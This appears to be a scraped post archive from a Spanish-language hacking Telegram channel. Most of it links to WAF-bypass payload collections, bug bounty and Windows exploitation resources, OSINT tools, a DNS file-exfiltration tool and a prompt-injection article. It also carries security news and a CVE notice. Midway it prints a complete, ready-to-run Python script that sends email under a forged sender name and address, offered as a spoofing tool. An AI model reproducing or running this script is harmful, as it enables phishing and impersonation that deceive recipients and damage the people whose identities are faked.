ӉѦСҠіИԌ ҬЄѦӍ СѦИѦL ѺҒіСіѦL DіҒԱՏіóИ
Closed channel
1 781
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
Waf-Bypass: comprueba tu WAF antes de que lo haga un atacante
LFI -Local File
MFD -multipart/form-data
NoSQLi
OR -Open Redirect
RCE -Remote Code Execution
RFI -Remote File Inclusion
SQLi
SSI -Server-Side Includes
SSRF -Server-side request forgery
XSS
https://github.com/nemesida-waf/waf-bypass
AWESOME BUGBOUNTY TOOLS
Subdomain Enumeration
Port Scanning
Fuzzing
GraphQL/CRLF/CSRF/SQL/XSS/XXE Injections
Directory Traversal
Open Redirect
Subdomain Takeover
and more.
https://github.com/vavkamil/awesome-bugbounty-tools
#BlueTeam #windows #exploit
Awesome Advanced Windows Exploitation References
https://github.com/yeyintminthuhtut/Awesome-Advanced-Windows-Exploitation-References
¿HACKING VIAJE?
1. Desarrollar una sólida comprensión de la programación informática y los principios de desarrollo de software. Conozca varios lenguajes, como Python, Ruby, JavaScript, Swift y C++.
2. Desarrolle una fuerte mentalidad de seguridad. Comprender los conceptos de seguridad comunes, como la autenticación, el cifrado, el control de acceso a la red y los firewalls.
3. Explora proyectos de código abierto. Hay numerosos proyectos por ahí, así que encuentra lo que te interesa y dedica tanto tiempo y esfuerzo como puedas.
4. Utilice la automatización siempre que sea posible. La automatización de tareas mundanas puede ahorrarle tiempo y energía para que pueda concentrarse en los aspectos más importantes de su proyecto.
5. Manténgase actualizado sobre las noticias de seguridad. Lea e investigue, pero también asista a conferencias de hackers y sea un participante activo en la comunidad.
6. Contribuir a la comunidad de seguridad. Enfréntate a programas de recompensas por errores, desarrolle algo nuevo que otros puedan usar, escriba un artículo o tutorial, o simplemente retribuya de otra manera.
7. Mantente siempre curioso. Una mentalidad inquisitiva lo mantendrá resistente y capaz de adaptarse a nuevas situaciones.
COMUNIDAD HACKING TEAM
Hackers Using Trojanized macOS Apps to Deploy Evasive Cryptocurrency Mining Malware https://thehackernews.com/2023/02/hackers-using-trojanized-macos-apps-to.html
Phylum Discovers Aggressive Attack on PyPI Attempting to Deliver Rust Executable https://blog.phylum.io/phylum-discovers-another-attack-on-pypi
Chatdoctor
ChatDoctor es un modelo de una nueva generación de inteligencia artificial, basada en el modelo de llama.
El propósito de este proyecto es proporcionar a los pacientes un asistente intelectual y confiable en el campo de la atención médica, que puede responder sus preguntas médicas y proporcionarles consultas médicas personalizadas.
Se sometió a capacitación en un gran cuerpo de literatura médica y tiene una comprensión profunda de la terminología médica, los procedimientos y los diagnósticos.
Los pacientes pueden interactuar con el modelo ChatDoctor a través de la interfaz de chat, hacer preguntas sobre su salud, síntomas o enfermedades.Luego, el modelo analizará la entrada y proporcionará una respuesta, adaptada a la situación única del paciente.
https://github.com/kent0n-li/chatdoctor
Arxiv: https://arxiv.org/abs/2303.14070
1. Elevation of Privilege from Local Admin to gMSA
https://aadinternals.com/post/local_admin_to_gmsa
2. Keeping LSA secrets out of physical memory
https://github.com/elastic/Silhouette
3. Basic SSTI - Server-Side Template Injection (2023)
https://infosecwriteups.com/basic-ssti-server-side-template-injection-2023-da4995583554
⚡️150+ Best Osint And Soucing Tools In the World⚡️
🔹Scraping, Parsing, Filtering, and Sorting contact data
Creating content with AI
Social Media Lookup & Monitoring
Contact Verification
Company Research and Datasets
and more.
♻️Tools -
https://booleanstrings.com/tools/
#Email spoofing
script.py source :
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
import traceback
import configparser
config = configparser.ConfigParser()
config.read('config.ini')
def send_mail(receiver_email, spoofed_email, spoofed_name, message, subject):
try:
msg = MIMEMultipart("related")
msg['From'] = f"{spoofed_name} <{spoofed_email}>"
msg['To'] = receiver_email
msg['Subject'] = subject
body = message
msg.attach(MIMEText(body, 'plain'))
# Get SMTP settings from config file
smtp_host = config.get('SMTP', 'host')
smtp_port = config.getint('SMTP', 'port')
smtp_username = config.get('SMTP', 'username')
smtp_password = config.get('SMTP', 'password')
# Connect to SMTP server and send email
server = smtplib.SMTP(smtp_host, smtp_port)
server.starttls()
server.login(smtp_username, smtp_password)
text = msg.as_string()
server.sendmail(spoofed_email, receiver_email, text)
server.quit()
print('Spoofed Email sent successfully to '+ str(receiver_email) + ' from ' + str(spoofed_name))
except Exception as e:
# Print the exception
print(traceback.format_exc())
receiver_email = '<Receivers Email Address>'
spoofed_email = '<Spoofed Email Address>'
spoofed_name = '<Spoofed Name>'
message = '<Text Message to send>'
subject = '<Email Subject/Title>'
# Invoke send_mail to send email
send_mail(receiver_email,spoofed_email,spoofed_name, message, subject)
AI Injections: Direct and Indirect Prompt Injections and Their Implications https://embracethered.com/blog/posts/2023/ai-injections-direct-and-indirect-prompt-injection-basics/
Have you ever wanted to transfer files over DNS A records? No? Well too bad lol, I've updated @domchell's PowerDNS to do that along with some other things. Could be useful for pentests with no standard outbound access... which yes I get quite a bit of.
https://github.com/icyguider/NewPowerDNS
#DNS
@NetPentesters
Hacker ha publicado recientemente un vídeo
de demostración en el que muestra cómo se
salta la autenticación de dos factores de
Telegram, lo que supone una grave amenaza
para los usuarios. Esto significa que se
puede acceder a tu cuenta incluso si
configuras el 2FA y adjuntas tu correo
electrónico.
Las 5 preguntas (y respuestas) que debe saber sobre ChatGPT
https://www.estrategiaynegocios.net/tecnologia-cultura-digital/las-5-preguntas-y-respuestas-que-debe-saber-sobre-chatgpt-PM12875587#pk_campaign=MASwpn&pk_kwd=Las+5+preguntas+%28y+respuestas%29+que+debe+saber+sobre+ChatGPT
📣🌡 🟧 CVE-2023-21005 ➡️ android
🆕 2023.3.24
🔄 2023.3.29
In getAvailabilityStatus of several Transcode Permission Controllers, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-261193946
📖 read more nist.gov
📖 read more cve.org